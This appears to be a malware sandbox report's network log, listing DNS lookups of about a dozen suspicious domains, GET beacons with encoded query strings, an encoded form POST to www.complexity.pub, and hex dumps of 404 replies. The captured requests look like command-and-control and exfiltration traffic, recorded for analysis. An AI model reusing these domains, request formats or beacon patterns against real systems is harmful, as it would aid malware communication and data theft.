            Source: global trafficHTTP traffic detected: GET /3cch/?GtLD=xFGdQ6FH&dxWljT6=DRiLKdz0S/bqEudf8+lJZmKhIEkCV4eCneZlIdHidh1UyVXSe2F494jKrmXjvhSAferATdA1WGLj27vrwJsZD/LqvQNnepl3kdPcsh0FNk4E92FpuHIxGGI= HTTP/1.1Host: www.lilibetmed.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /pn1r/?dxWljT6=gKnM/UYa57ur7VVzNcvkzBuMpwTVzE14/GtRoFWV9RJaxqyHi91lxRYvKS9XNcGV9MGsPko/NpaB+uWz1UCX1wHhyYSOikvVIVM8anokYkTUErXORgkeTZM=&GtLD=xFGdQ6FH HTTP/1.1Host: www.mbwd.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficDNS traffic detected: DNS query: www.nosr.net
            Source: global trafficDNS traffic detected: DNS query: www.monos.shop
            Source: global trafficDNS traffic detected: DNS query: www.complexity.pub
            Source: global trafficDNS traffic detected: DNS query: www.nevsehir-nakliyat.xyz
            Source: global trafficDNS traffic detected: DNS query: www.masteriocp.online
            Source: global trafficDNS traffic detected: DNS query: www.kryto.top
            Source: global trafficDNS traffic detected: DNS query: www.angelenterprise.biz
            Source: global trafficDNS traffic detected: DNS query: www.dyme.tech
            Source: global trafficDNS traffic detected: DNS query: www.lilibetmed.online
            Source: global trafficDNS traffic detected: DNS query: www.mbwd.store
            Source: global trafficDNS traffic detected: DNS query: www.terrearcenciel.online
            Source: unknownHTTP traffic detected: POST /4c7j/ HTTP/1.1Host: www.complexity.pubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Content-Length: 204Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedOrigin: http://www.complexity.pubReferer: http://www.complexity.pub/4c7j/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530Data Raw: 64 78 57 6c 6a 54 36 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6e 77 30 41 31 53 68 69 73 6e 76 6f 56 6e 56 67 38 32 55 30 36 34 55 31 46 35 65 5a 46 41 47 75 44 78 78 53 6c 43 6c 54 48 5a 61 6f 35 6c 63 69 48 39 4a 54 49 69 6f 76 64 72 6d 64 77 55 79 31 6c 47 6c 6c 38 30 71 37 32 30 5a 68 70 4d 61 6f 69 50 6b 50 31 4e 48 73 41 39 58 42 4b 62 43 76 71 59 2f 78 78 46 33 49 51 68 4e 37 2b 5a 45 64 73 42 51 2b 38 2b 6c 79 41 7a 35 71 45 44 4a 4f 73 48 72 38 4a 52 66 63 52 70 50 4f 33 33 68 6e 4e 52 49 35 44 4c 41 77 52 66 78 61 6d 63 7a 71 61 4b 51 64 6f 2f 4c 36 73 31 6c 36 58 59 75 57 71 69 53 6b 4d 41 3d 3d Data Ascii: dxWljT6=spsn588TGAkFnw0A1ShisnvoVnVg82U064U1F5eZFAGuDxxSlClTHZao5lciH9JTIiovdrmdwUy1lGll80q720ZhpMaoiPkP1NHsA9XBKbCvqY/xxF3IQhN7+ZEdsBQ+8+lyAz5qEDJOsHr8JRfcRpPO33hnNRI5DLAwRfxamczqaKQdo/L6s1l6XYuWqiSkMA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Sep 2024 19:43:32 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sat, 07 Sep 2024 19:43:59 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sat, 07 Sep 2024 19:44:02 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sat, 07 Sep 2024 19:44:05 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Sat, 07 Sep 2024 19:44:07 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 07 Sep 2024 19:44:13 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-07T19:44:18.5264901Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 07 Sep 2024 19:44:16 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-09-07T19:44:18.5264901Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 07 Sep 2024 19:44:18 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-07T19:44:23.7520817Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 07 Sep 2024 19:44:21 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-07T19:44:26.1475682Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Sep 2024 19:44:41 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Sep 2024 19:44:43 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
